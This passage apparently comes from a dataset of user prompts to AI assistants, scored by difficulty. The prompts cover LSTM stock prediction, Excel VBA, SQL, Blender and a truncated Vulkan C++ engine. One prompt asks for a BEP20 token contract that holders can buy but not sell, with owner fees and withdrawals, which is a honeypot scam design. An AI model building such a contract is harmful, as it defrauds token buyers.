"intermediate": 0.4395500123500824,
"beginner": 0.26292169094085693,
"expert": 0.2975282669067383
}
|
11,283
|
Use this model and make a prediction for the next day (This model is trained on the data start='2009-01-01', end='2021-01-01' now give a prediction for what will be the price on 2021-01-02 (I have no information of that day)):
import yfinance as yf
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, LSTM
from keras.callbacks import LambdaCallback
import datetime
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
nifty = yf.download('^NSEI', start='2009-01-01', end='2021-01-01')
def supertrend(df, period=10, multiplier=3):
hl = (df['High'] + df['Low']) / 2
atr = df['High'].rolling(period).max() - df['Low'].rolling(period).min()
up = hl - multiplier * atr
dn = hl + multiplier * atr
df['ST'] = 0
df['ST'][0] = (df['High'][0] + df['Low'][0]) / 2
position = 'none'
for i in range(1, len(df)):
if df['Close'][i] > up[i]:
if position != 'buy':
position = 'buy'
df['ST'][i] = dn[i]
else:
df['ST'][i] = max(df['ST'][i - 1], dn[i])
elif df['Close'][i] < dn[i]:
if position != 'sell':
position = 'sell'
df['ST'][i] = up[i]
else:
df['ST'][i] = min(df['ST'][i - 1], up[i])
else:
df['ST'][i] = df['ST'][i - 1]
return df
nifty = supertrend(nifty)
nifty.head()
dataset = nifty['Close'].values
dataset = dataset.astype('float32')
dataset = dataset.reshape(-1, 1)
scaler = MinMaxScaler(feature_range=(0, 1))
dataset = scaler.fit_transform(dataset)
# convert an array of values into a dataset matrix
def create_dataset(dataset, look_back=1):
dataX, dataY = [], []
for i in range(len(dataset)-look_back-1):
a = dataset[i:(i+look_back), 0]
dataX.append(a)
dataY.append(dataset[i + look_back, 0])
return np.array(dataX), np.array(dataY)
train_size = int(len(dataset) * 0.8)
test_size = len(dataset) - train_size
train, test = dataset[:train_size], dataset[train_size:]
look_back = 1
trainX, trainY = create_dataset(train, look_back)
testX, testY = create_dataset(test, look_back)
trainX = np.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))
testX = np.reshape(testX, (testX.shape[0], 1, testX.shape[1]))
model = Sequential()
model.add(LSTM(100, input_shape=(1, look_back)))
model.add(Dense(1))
model.compile(loss='mean_squared_error', optimizer='adam')
model.fit(trainX, trainY, epochs=200, batch_size=1, verbose=0)
trainPredict = model.predict(trainX)
testPredict = model.predict(testX)
trainPredict = scaler.inverse_transform(trainPredict)
trainY = scaler.inverse_transform([trainY])
testPredict = scaler.inverse_transform(testPredict)
testY = scaler.inverse_transform([testY])
import matplotlib.pyplot as plt
trainPredictPlot = np.empty_like(dataset)
trainPredictPlot[:, :] = np.nan
trainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict
testPredictPlot = np.empty_like(dataset)
testPredictPlot[:, :] = np.nan
testPredictPlot[len(trainPredict)+(look_back*2)+1:len(dataset)-1, :] = testPredict
plt.plot(scaler.inverse_transform(dataset), label='Actual')
plt.plot(trainPredictPlot, label='Train Prediction')
plt.plot(testPredictPlot, label='Test Prediction')
plt.legend()
plt.show()
model.save('my_model.h5')
|
0f3301799a42e380350013b5a6e130c9
|
{
"intermediate": 0.38459697365760803,
"beginner": 0.31749266386032104,
"expert": 0.29791033267974854
}
|
11,284
|
Make a stock market prediction model using LSTM use the below code as starting point(You may need to modify it) using supertrend as indicator you also need to make prediction for the next day (For eg the data is trained on start='2009-01-01', end='2021-01-01' make prediction for price at '2021-01-02'):
Code:
import yfinance as yf
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, LSTM
from keras.callbacks import LambdaCallback
import datetime
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
nifty = yf.download('^NSEI', start='2009-01-01', end='2021-01-01')
def supertrend(df, period=10, multiplier=3):
hl = (df['High'] + df['Low']) / 2
atr = df['High'].rolling(period).max() - df['Low'].rolling(period).min()
up = hl - multiplier * atr
dn = hl + multiplier * atr
df['ST'] = 0
df['ST'][0] = (df['High'][0] + df['Low'][0]) / 2
position = 'none'
for i in range(1, len(df)):
if df['Close'][i] > up[i]:
if position != 'buy':
position = 'buy'
df['ST'][i] = dn[i]
else:
df['ST'][i] = max(df['ST'][i - 1], dn[i])
elif df['Close'][i] < dn[i]:
if position != 'sell':
position = 'sell'
df['ST'][i] = up[i]
else:
df['ST'][i] = min(df['ST'][i - 1], up[i])
else:
df['ST'][i] = df['ST'][i - 1]
return df
nifty = supertrend(nifty)
nifty.head()
dataset = nifty['Close'].values
dataset = dataset.astype('float32')
dataset = dataset.reshape(-1, 1)
scaler = MinMaxScaler(feature_range=(0, 1))
dataset = scaler.fit_transform(dataset)
# convert an array of values into a dataset matrix
def create_dataset(dataset, look_back=1):
dataX, dataY = [], []
for i in range(len(dataset)-look_back-1):
a = dataset[i:(i+look_back), 0]
dataX.append(a)
dataY.append(dataset[i + look_back, 0])
return np.array(dataX), np.array(dataY)
train_size = int(len(dataset) * 0.8)
test_size = len(dataset) - train_size
train, test = dataset[:train_size], dataset[train_size:]
look_back = 1
trainX, trainY = create_dataset(train, look_back)
testX, testY = create_dataset(test, look_back)
trainX = np.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))
testX = np.reshape(testX, (testX.shape[0], 1, testX.shape[1]))
model = Sequential()
model.add(LSTM(100, input_shape=(1, look_back)))
model.add(Dense(1))
model.compile(loss='mean_squared_error', optimizer='adam')
model.fit(trainX, trainY, epochs=200, batch_size=1, verbose=0)
trainPredict = model.predict(trainX)
testPredict = model.predict(testX)
trainPredict = scaler.inverse_transform(trainPredict)
trainY = scaler.inverse_transform([trainY])
testPredict = scaler.inverse_transform(testPredict)
testY = scaler.inverse_transform([testY])
import matplotlib.pyplot as plt
trainPredictPlot = np.empty_like(dataset)
trainPredictPlot[:, :] = np.nan
trainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict
testPredictPlot = np.empty_like(dataset)
testPredictPlot[:, :] = np.nan
testPredictPlot[len(trainPredict)+(look_back*2)+1:len(dataset)-1, :] = testPredict
plt.plot(scaler.inverse_transform(dataset), label='Actual')
plt.plot(trainPredictPlot, label='Train Prediction')
plt.plot(testPredictPlot, label='Test Prediction')
plt.legend()
plt.show()
model.save('my_model.h5')
from sklearn.metrics import mean_squared_error
import math
trainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:,0]))
print('Train Score: %.2f RMSE' % (trainScore))
testScore = math.sqrt(mean_squared_error(testY[0], testPredict[:,0]))
print('Test Score: %.2f RMSE' % (testScore))
|
f1c30b45999e5df7acc3a753f4f60d65
|
{
"intermediate": 0.37994763255119324,
"beginner": 0.28402408957481384,
"expert": 0.3360283076763153
}
|
11,285
|
Each cell in Column G23 to G53 displays a sheet name.
I would like to click on a sheet name and go to the sheet.
How will I write this VBA code
|
e3e3e7b418eeba20ce0a4a4516635a64
|
{
"intermediate": 0.302672803401947,
"beginner": 0.3805769681930542,
"expert": 0.3167502284049988
}
|
11,286
|
AND DATE(operation.DateSave)BETWEEN '2023-05-01' AND '2023-05-31' ORDER BY operation.DateSave ASC
|
589994d18385b897c8c31dd6dcba5b30
|
{
"intermediate": 0.384835422039032,
"beginner": 0.25302034616470337,
"expert": 0.36214426159858704
}
|
11,287
|
blender 3.51 script geometry nodes examples
|
9978c7e110d47eab30f301395b57d40b
|
{
"intermediate": 0.35155215859413147,
"beginner": 0.3000461459159851,
"expert": 0.3484016954898834
}
|
11,288
|
Create solidity BEP20 bsc chain smart contract exact implementation with all features mentioned below:
0. restorable
1. payable
2. ownable
3. pausable
4. has liquidity pool features on uniswap and tokens cannot be sold by holders
5. bsc chain smart contract proxy
6. change ownership of BEP20 contract
7. send initial supply to smart contract and owner.
8. mintable by anyone for paying BNB.
9. owner can remove contract address ETH.
10. take fee from every transaction and add to owner and to liquidity pool.
11. be modifiable by owner.
12. token holders can buy token but can't sell the token.
13. have all possible features which is not mentioned and and imports from openzeppelin.
14. include all necessary imports to token class.
|
beb8e01797d3f75e7e29a6365e0fc3ea
|
{
"intermediate": 0.3238583207130432,
"beginner": 0.24647784233093262,
"expert": 0.42966383695602417
}
|
11,289
|
I’m building a video game engine using C++ as the coding language and Vulkan for graphics. I am trying to set up a generic renderer using Vulkan that is flexible and will render objects based on a vector that is supplied to it. The renderer will also handle the creation of the window using GLFW and use GLM for all relevant math calls. I am using the ASSIMP library to load 3d models and animations.
Here is a portion of the code:
BufferUtils.h:
#pragma once
#include <vulkan/vulkan.h>
#include <stdint.h>
namespace BufferUtils
{
void CreateBuffer(
VkDevice device, VkPhysicalDevice physicalDevice,
VkDeviceSize size, VkBufferUsageFlags usage, VkMemoryPropertyFlags properties,
VkBuffer& buffer, VkDeviceMemory& bufferMemory);
uint32_t FindMemoryType(VkPhysicalDevice physicalDevice, uint32_t typeFilter, VkMemoryPropertyFlags properties);
void CopyBuffer(
VkDevice device, VkCommandPool commandPool, VkQueue graphicsQueue,
VkBuffer srcBuffer, VkBuffer dstBuffer, VkDeviceSize size);
}
Camera.h:
#pragma once
#include <glm/glm.hpp>
class Camera
{
public:
Camera();
~Camera();
void Initialize(float aspectRatio);
void Shutdown();
void SetPosition(const glm::vec3& position);
void SetRotation(const glm::vec3& rotation);
const glm::mat4& GetViewMatrix() const;
const glm::mat4& GetProjectionMatrix() const;
private:
glm::vec3 position;
glm::vec3 rotation;
glm::mat4 viewMatrix;
glm::mat4 projectionMatrix;
void UpdateViewMatrix();
};
Engine.h:
#pragma once
#include "Window.h"
#include "Renderer.h"
#include "Scene.h"
#include <chrono>
#include <thread>
class Engine
{
public:
Engine();
~Engine();
void Run();
void Shutdown();
int MaxFPS = 60;
private:
void Initialize();
void MainLoop();
void Update(float deltaTime);
void Render();
Window window;
Renderer renderer;
Scene scene;
};
GameObject.h:
#pragma once
#include <glm/glm.hpp>
#include "Mesh.h"
#include "Material.h"
#include "Camera.h"
#include "Renderer.h"
class GameObject
{
public:
GameObject();
~GameObject();
void Initialize();
void Initialize2(Renderer& renderer);
void Update(float deltaTime);
void Render(Renderer& renderer, const Camera& camera);
void Shutdown();
void SetPosition(const glm::vec3& position);
void SetRotation(const glm::vec3& rotation);
void SetScale(const glm::vec3& scale);
Mesh* GetMesh();
Material* GetMaterial();
private:
glm::mat4 modelMatrix;
glm::vec3 position;
glm::vec3 rotation;
glm::vec3 scale;
VkDeviceMemory mvpBufferMemory;
VkBuffer mvpBuffer;
Mesh* mesh;
Material* material;
bool initialized = false;
void UpdateModelMatrix();
};
Material.h:
#pragma once
#include <vulkan/vulkan.h>
#include "Texture.h"
#include "Shader.h"
#include <stdexcept>
#include <memory> // Don’t forget to include <memory>
#include <array>
// Add this struct outside the Material class, possibly at the top of Material.cpp
struct ShaderDeleter {
void operator()(Shader* shaderPtr) {
if (shaderPtr != nullptr) {
Shader::Cleanup(shaderPtr);
}
}
};
class Material
{
public:
Material();
~Material();
void Initialize(const std::string& vertShaderPath, const std::string& fragShaderPath, const std::string& texturePath, VkDevice device, VkDescriptorSetLayout descriptorSetLayout, VkDescriptorPool descriptorPool, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Cleanup();
void LoadTexture(const std::string& filename, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void LoadShaders(const std::string& vertFilename, const std::string& fragFilename, VkDevice device);
void UpdateBufferBinding(VkBuffer newBuffer, VkDevice device, VkDeviceSize devicesize);
VkDescriptorSet GetDescriptorSet() const;
VkPipelineLayout GetPipelineLayout() const;
std::shared_ptr <Shader> GetvertexShader();
std::shared_ptr <Shader> GetfragmentShader();
void CreateDescriptorSet(VkBuffer uniformBuffer, VkDeviceSize bufferSize);
private:
VkDevice device;
std::shared_ptr <Shader> vertexShader;
std::shared_ptr <Shader> fragmentShader;
std::shared_ptr<Texture> texture;
void CreatePipelineLayout(VkDescriptorSetLayout descriptorSetLayout);
VkDescriptorSet descriptorSet;
VkPipelineLayout pipelineLayout;
VkDescriptorSetLayout descriptorSetLayout;// = VK_NULL_HANDLE;
VkDescriptorPool descriptorPool;
void CleanupDescriptorSetLayout();
};
Mesh.h:
#pragma once
#include <vector>
#include <vulkan/vulkan.h>
#include <glm/glm.hpp>
#include "BufferUtils.h"
struct Vertex {
glm::vec3 position;
glm::vec3 color;
glm::vec2 texCoord;
};
class Mesh
{
public:
Mesh();
~Mesh();
void Initialize(std::vector<Vertex> vertices, std::vector<uint32_t> indices, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Initialize(VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Cleanup();
const std::vector<Vertex>& GetVertices() const;
const std::vector<uint32_t>& GetIndices() const;
VkBuffer GetVertexBuffer() const;
VkBuffer GetIndexBuffer() const;
void SetVertices(const std::vector<Vertex>& vertices);
void SetIndices(const std::vector<uint32_t>& indices);
std::vector<VkVertexInputBindingDescription> GetVertexInputBindingDescriptions() const;
std::vector<VkVertexInputAttributeDescription> GetVertexInputAttributeDescriptions() const;
private:
VkDevice device;
std::vector<Vertex> vertices;
std::vector<uint32_t> indices;
VkBuffer vertexBuffer;
VkDeviceMemory vertexBufferMemory;
VkBuffer indexBuffer;
VkDeviceMemory indexBufferMemory;
};
Model.h:
#pragma once
#include <assimp/Importer.hpp>
#include <assimp/scene.h>
#include <assimp/postprocess.h>
#include "Mesh.h"
#include <string>
#include <vector>
#include <vulkan/vulkan.h>
#include <stdexcept>
class Model
{
public:
Model();
~Model();
void LoadModel(const std::string& filepath, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Cleanup();
const std::vector<Mesh>& GetMeshes() const;
private:
std::vector<Mesh> meshes;
void LoadNode(aiNode* node, const aiScene* scene, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
Mesh LoadMesh(aiMesh* mesh, const aiScene* scene);
};
Pipeline.h:
#pragma once
#include <vulkan/vulkan.h>
#include <vector>
#include <array>
#include <stdexcept>
#include "Shader.h"
class Pipeline
{
public:
Pipeline();
~Pipeline();
void CreateGraphicsPipeline(const std::vector<VkVertexInputBindingDescription>& vertexBindingDescriptions,
const std::vector<VkVertexInputAttributeDescription>& vertexAttributeDescriptions,
VkExtent2D swapchainExtent,
const std::vector<Shader*>& shaders,
VkRenderPass renderPass,
VkPipelineLayout pipelineLayout,
VkDevice device);
void Cleanup();
VkPipeline GetPipeline() const;
bool IsInitialized() const;
private:
VkDevice device;
VkPipeline pipeline;
bool initialized;
void CreateShaderStages(const std::vector<Shader*>& shaders, std::vector<VkPipelineShaderStageCreateInfo>& shaderStages);
};
Renderer.h:
#pragma once
#include <vulkan/vulkan.h>
#include "Window.h"
#include <vector>
#include <stdexcept>
#include <set>
#include <optional>
#include <iostream>
#include "Pipeline.h"
#include "Material.h"
#include "Mesh.h"
struct QueueFamilyIndices
{
std::optional<uint32_t> graphicsFamily;
std::optional<uint32_t> presentFamily;
bool IsComplete()
{
return graphicsFamily.has_value() && presentFamily.has_value();
}
};
struct SwapChainSupportDetails {
VkSurfaceCapabilitiesKHR capabilities;
std::vector<VkSurfaceFormatKHR> formats;
std::vector<VkPresentModeKHR> presentModes;
};
struct MVP {
glm::mat4 model;
glm::mat4 view;
glm::mat4 projection;
};
class Renderer
{
public:
Renderer();
~Renderer();
void Initialize(GLFWwindow* window);
void Shutdown();
void BeginFrame();
void EndFrame();
VkDescriptorSetLayout CreateDescriptorSetLayout();
VkDescriptorPool CreateDescriptorPool(uint32_t maxSets);
VkDevice* GetDevice();
VkPhysicalDevice* GetPhysicalDevice();
VkCommandPool* GetCommandPool();
VkQueue* GetGraphicsQueue();
VkCommandBuffer* GetCurrentCommandBuffer();
std::shared_ptr<Pipeline> GetPipeline();
void CreateGraphicsPipeline(Mesh* mesh, Material* material);
std::pair<VkBuffer, VkDeviceMemory> RequestMvpBuffer();
private:
bool isShutDown = false;
static const uint32_t kMvpBufferCount = 3;
std::vector<VkBuffer> mvpBuffers;
std::vector<VkDeviceMemory> mvpBufferMemory;
uint32_t currentMvpBufferIndex = 0;
bool shutdownInProgress;
uint32_t currentCmdBufferIndex = 0;
std::vector<size_t> currentFramePerImage;
std::vector<VkImage> swapChainImages;
std::vector<VkImageView> swapChainImageViews;
VkExtent2D swapChainExtent;
VkRenderPass renderPass;
uint32_t imageIndex;
std::shared_ptr<Pipeline> pipeline;
VkFormat swapChainImageFormat;
std::vector<VkCommandBuffer> commandBuffers;
void CreateImageViews();
void CleanupImageViews();
void CreateRenderPass();
void CleanupRenderPass();
void CreateSurface();
void DestroySurface();
void CreateInstance();
void CleanupInstance();
void ChoosePhysicalDevice();
void CreateDevice();
void CleanupDevice();
void CreateSwapchain();
void CleanupSwapchain();
void CreateCommandPool();
void CleanupCommandPool();
void CreateFramebuffers();
void CleanupFramebuffers();
void CreateCommandBuffers();
void CleanupCommandBuffers();
void Present();
GLFWwindow* window;
VkInstance instance = VK_NULL_HANDLE;
VkPhysicalDevice physicalDevice = VK_NULL_HANDLE;
VkDevice device = VK_NULL_HANDLE;
VkSurfaceKHR surface;
VkSwapchainKHR swapchain;
VkCommandPool commandPool;
VkCommandBuffer currentCommandBuffer;
std::vector<VkFramebuffer> framebuffers;
// Additional Vulkan objects needed for rendering…
const uint32_t kMaxFramesInFlight = 2;
std::vector<VkSemaphore> imageAvailableSemaphores;
std::vector<VkSemaphore> renderFinishedSemaphores;
std::vector<VkFence> inFlightFences;
size_t currentFrame;
VkQueue graphicsQueue;
VkQueue presentQueue;
void CreateSyncObjects();
void CleanupSyncObjects();
SwapChainSupportDetails querySwapChainSupport(VkPhysicalDevice device, VkSurfaceKHR surface);
VkSurfaceFormatKHR chooseSwapSurfaceFormat(const std::vector<VkSurfaceFormatKHR>& availableFormats);
VkPresentModeKHR chooseSwapPresentMode(const std::vector<VkPresentModeKHR>& availablePresentModes);
VkExtent2D chooseSwapExtent(const VkSurfaceCapabilitiesKHR& capabilities, GLFWwindow* window);
std::vector<const char*> deviceExtensions = {
VK_KHR_SWAPCHAIN_EXTENSION_NAME
};
std::vector<const char*> CheckPhysicalDeviceExtensionSupport(VkPhysicalDevice physicalDevice);
QueueFamilyIndices GetQueueFamilyIndices(VkPhysicalDevice physicalDevice);
};
Scene.h:
#pragma once
#include <vector>
#include "GameObject.h"
#include "Camera.h"
#include "Renderer.h"
class Scene
{
public:
Scene();
~Scene();
void Initialize();
void Update(float deltaTime);
void Render(Renderer& renderer);
void Shutdown();
void AddGameObject(GameObject* gameObject);
Camera& GetCamera();
float temp;
private:
std::vector<GameObject*> gameObjects;
Camera camera;
};
Shader.h:
#pragma once
#include <vulkan/vulkan.h>
#include <string>
class Shader
{
public:
Shader();
~Shader();
void LoadFromFile(const std::string& filename, VkDevice device, VkShaderStageFlagBits stage);
VkPipelineShaderStageCreateInfo GetPipelineShaderStageCreateInfo() const;
static void Cleanup(Shader* shader);
private:
VkDevice device;
VkShaderModule shaderModule;
VkShaderStageFlagBits stage;
};
Simplex.h:
#pragma once
#ifndef SIMPLEX_H
#define SIMPLEX_H
#include <iostream>
class SimplexNoise {
private:
int testvar;
int grad3[12][3]{ { 1, 1, 0 }, { -1, 1, 0 }, { 1, -1, 0 },
{ -1, -1, 0 }, { 1, 0, 1 }, { -1, 0, 1 }, { 1, 0, -1 },
{ -1, 0, -1 }, { 0, 1, 1 }, { 0, -1, 1 }, { 0, 1, -1 },
{ 0, -1, -1 } };
int grad4[32][4] = { { 0, 1, 1, 1 }, { 0, 1, 1, -1 },
{ 0, 1, -1, 1 }, { 0, 1, -1, -1 }, { 0, -1, 1, 1 },
{ 0, -1, 1, -1 }, { 0, -1, -1, 1 }, { 0, -1, -1, -1 },
{ 1, 0, 1, 1 }, { 1, 0, 1, -1 }, { 1, 0, -1, 1 }, { 1, 0, -1, -1 },
{ -1, 0, 1, 1 }, { -1, 0, 1, -1 }, { -1, 0, -1, 1 },
{ -1, 0, -1, -1 }, { 1, 1, 0, 1 }, { 1, 1, 0, -1 },
{ 1, -1, 0, 1 }, { 1, -1, 0, -1 }, { -1, 1, 0, 1 },
{ -1, 1, 0, -1 }, { -1, -1, 0, 1 }, { -1, -1, 0, -1 },
{ 1, 1, 1, 0 }, { 1, 1, -1, 0 }, { 1, -1, 1, 0 }, { 1, -1, -1, 0 },
{ -1, 1, 1, 0 }, { -1, 1, -1, 0 }, { -1, -1, 1, 0 },
{ -1, -1, -1, 0 } };
int p_supply[256] = { 151, 160, 137, 91, 90, 15, 131, 13, 201, 95, 96,
53, 194, 233, 7, 225, 140, 36, 103, 30, 69, 142, 8, 99, 37, 240,
21, 10, 23, 190, 6, 148, 247, 120, 234, 75, 0, 26, 197, 62, 94,
252, 219, 203, 117, 35, 11, 32, 57, 177, 33, 88, 237, 149, 56, 87,
174, 20, 125, 136, 171, 168, 68, 175, 74, 165, 71, 134, 139, 48,
27, 166, 77, 146, 158, 231, 83, 111, 229, 122, 60, 211, 133, 230,
220, 105, 92, 41, 55, 46, 245, 40, 244, 102, 143, 54, 65, 25, 63,
161, 1, 216, 80, 73, 209, 76, 132, 187, 208, 89, 18, 169, 200, 196,
135, 130, 116, 188, 159, 86, 164, 100, 109, 198, 173, 186, 3, 64,
52, 217, 226, 250, 124, 123, 5, 202, 38, 147, 118, 126, 255, 82,
85, 212, 207, 206, 59, 227, 47, 16, 58, 17, 182, 189, 28, 42, 223,
183, 170, 213, 119, 248, 152, 2, 44, 154, 163, 70, 221, 153, 101,
155, 167, 43, 172, 9, 129, 22, 39, 253, 19, 98, 108, 110, 79, 113,
224, 232, 178, 185, 112, 104, 218, 246, 97, 228, 251, 34, 242, 193,
238, 210, 144, 12, 191, 179, 162, 241, 81, 51, 145, 235, 249, 14,
239, 107, 49, 192, 214, 31, 181, 199, 106, 157, 184, 84, 204, 176,
115, 121, 50, 45, 127, 4, 150, 254, 138, 236, 205, 93, 222, 114,
67, 29, 24, 72, 243, 141, 128, 195, 78, 66, 215, 61, 156, 180 };
// To remove the need for index wrapping, double the permutation table
// length
int perm[512] = {};
/*static {
for (int i = 0; i < 512; i++)
perm[i] = p[i & 255];
}*/
// A lookup table to traverse the simplex around a given point in 4D.
// Details can be found where this table is used, in the 4D noise method.
int simplex[64][4] = { { 0, 1, 2, 3 }, { 0, 1, 3, 2 },
{ 0, 0, 0, 0 }, { 0, 2, 3, 1 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 1, 2, 3, 0 }, { 0, 2, 1, 3 }, { 0, 0, 0, 0 },
{ 0, 3, 1, 2 }, { 0, 3, 2, 1 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 1, 3, 2, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 1, 2, 0, 3 }, { 0, 0, 0, 0 },
{ 1, 3, 0, 2 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 2, 3, 0, 1 }, { 2, 3, 1, 0 }, { 1, 0, 2, 3 }, { 1, 0, 3, 2 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 2, 0, 3, 1 },
{ 0, 0, 0, 0 }, { 2, 1, 3, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 2, 0, 1, 3 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 3, 0, 1, 2 }, { 3, 0, 2, 1 },
{ 0, 0, 0, 0 }, { 3, 1, 2, 0 }, { 2, 1, 0, 3 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 3, 1, 0, 2 }, { 0, 0, 0, 0 },
{ 3, 2, 0, 1 }, { 3, 2, 1, 0 } };
int p[256] = {};
int RANDOMSEED = 0;
int NUMBEROFSWAPS = 400;
public:
SimplexNoise(int inseed);
double noise(double xin, double yin);
double noise(double xin, double yin, double zin);
double noise(double xin, double yin, double zin, double win);
};
#endif
Terrain.h:
#pragma once
#include "Simplex.h"
#include "Mesh.h"
#include "Material.h"
#include "GameObject.h"
// Procedurally generated terrain: samples simplex noise into a height map and
// turns it into a renderable GameObject (mesh + material).
class Terrain {
public:
// seed: noise seed; worldSize: grid dimension (presumably vertices per side — TODO confirm);
// scale: horizontal spacing of grid samples. The Vulkan handles are borrowed
// pointers owned by the Renderer; Terrain must not destroy them.
Terrain(int seed, int worldSize, float scale, VkDevice* device, VkPhysicalDevice* physicalDevice, VkCommandPool* commandPool, VkQueue* graphicsQueue);
~Terrain();
// Builds the height map and mesh data, then creates the terrain GameObject
// using the supplied descriptor set layouts and pool.
void GenerateTerrain(VkDescriptorSetLayout descriptorSetLayout, VkDescriptorSetLayout samplerDescriptorSetLayout, VkDescriptorPool descriptorPool);
// Returns the terrain GameObject. NOTE(review): ownership is unclear from the
// header — presumably Terrain retains it; confirm against the .cpp.
GameObject* GetTerrainObject();
private:
void GenerateHeightMap();           // fills heightMap from SimplexNoise
void ConvertHeightMapToMeshData();  // derives vertices/indices from heightMap
int seed;
int worldSize;
float scale;
// Borrowed Vulkan handles (not owned).
VkDevice* device;
VkPhysicalDevice* physicalDevice;
VkCommandPool* commandPool;
VkQueue* graphicsQueue;
SimplexNoise noise;
std::vector<std::vector<float>> heightMap;  // 2D grid of height samples
std::vector<Vertex> vertices;
std::vector<uint32_t> indices;
Mesh* terrainMesh;
Material* terrainMaterial;
GameObject* terrainObject;
};
Texture.h:
#pragma once
#include <vulkan/vulkan.h>
#include "stb_image.h" // Include the stb_image header
#include "BufferUtils.h"
#include <string>
// 2D texture loaded from an image file via stb_image and uploaded into a
// Vulkan image with mipmaps, a view and a sampler.
class Texture
{
public:
Texture();
~Texture();
// Loads the image file, uploads it to a device-local VkImage and creates
// the view/sampler. The Vulkan handles are stored for later cleanup.
void LoadFromFile(const std::string& filename, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
VkImageView GetImageView() const;   // valid only after LoadFromFile()
VkSampler GetSampler() const;       // valid only after LoadFromFile()
void Cleanup();                     // destroys image/view/sampler and frees memory
private:
VkDevice device;
VkImage image;
VkDeviceMemory imageMemory;
VkImageView imageView;
VkSampler sampler;
VkPhysicalDevice physicalDevice;
VkCommandPool commandPool;
VkQueue graphicsQueue;
bool initialized = false;           // guards double cleanup
void CreateImage(uint32_t width, uint32_t height, uint32_t mipLevels, VkSampleCountFlagBits numSamples,
VkFormat format, VkImageTiling tiling, VkImageUsageFlags usage, VkMemoryPropertyFlags properties);
void TransitionImageLayout(VkImageLayout oldLayout, VkImageLayout newLayout,
uint32_t mipLevels, VkSampleCountFlagBits numSamples);
void CopyBufferToImage(VkBuffer buffer, uint32_t width, uint32_t height);
void CreateImageView(VkFormat format, VkImageAspectFlags aspectFlags, uint32_t mipLevels);
void CreateSampler(uint32_t mipLevels);
void GenerateMipmaps(uint32_t width, uint32_t height, uint32_t mipLevels);
// One-shot command-buffer helpers for the upload/transition/blit work.
VkCommandBuffer BeginSingleTimeCommands(VkCommandPool commandPool, VkDevice device);
void EndSingleTimeCommands(VkCommandPool commandPool, VkQueue graphicsQueue, VkDevice device, VkCommandBuffer commandBuffer);
};
Window.h:
#pragma once
#define GLFW_INCLUDE_VULKAN
#include <GLFW/glfw3.h>
// Thin GLFW wrapper: owns the OS window, pumps events, and reports the
// per-frame delta time.
class Window
{
public:
Window(int width = 800, int height = 600, const char* title = "Game Engine");
~Window();
void Initialize();              // creates the GLFW window (GLFW_INCLUDE_VULKAN is defined above)
void PollEvents();              // pumps the GLFW event queue
void Shutdown();                // destroys the window
bool ShouldClose() const;       // true once the user requested close
GLFWwindow* GetWindow() const;  // borrowed handle; Window retains ownership
float GetDeltaTime();           // seconds elapsed since the previous call
private:
static void FramebufferResizeCallback(GLFWwindow* window, int width, int height);
static void keyCallback(GLFWwindow* window, int key, int scancode, int action, int mods);
int width;
int height;
const char* title;
GLFWwindow* window;
double lastFrameTime;           // timestamp used by GetDeltaTime()
};
GameObject.cpp:
#include "GameObject.h"
#include <glm/gtc/matrix_transform.hpp>
// Default-construct at the origin with zero rotation and unit scale.
// NOTE(review): modelMatrix is left uninitialized here; it is first built by
// SetScale() inside Initialize() — confirm Render() is never reached before that.
GameObject::GameObject()
: position(glm::vec3(0.0f, 0.0f, 0.0f)), rotation(glm::vec3(0.0f, 0.0f, 0.0f)), scale(1.0f)
{
}
// Releases resources exactly once: Shutdown() clears `initialized`, so an
// earlier explicit Shutdown() is not repeated here.
GameObject::~GameObject()
{
if (initialized)
{
Shutdown();
}
}
// Allocates a fresh Mesh and Material and marks the object initialized.
// NOTE(review): calling Initialize() twice leaks the previous mesh/material —
// consider deleting the old pointers or asserting !initialized.
void GameObject::Initialize()
{
mesh = new Mesh{};
material = new Material{};
SetScale(glm::vec3(1.0f)); // also builds modelMatrix via UpdateModelMatrix()
this->initialized = true;
}
// Second-phase initialization: acquires an MVP uniform buffer from the
// renderer, wires it into the material's descriptor set, and builds the
// graphics pipeline. Must run after Initialize() and Material::Initialize().
void GameObject::Initialize2(Renderer& renderer)
{
auto [mvpBuffer2, mvpBufferMemory2] = renderer.RequestMvpBuffer();
mvpBuffer = mvpBuffer2;
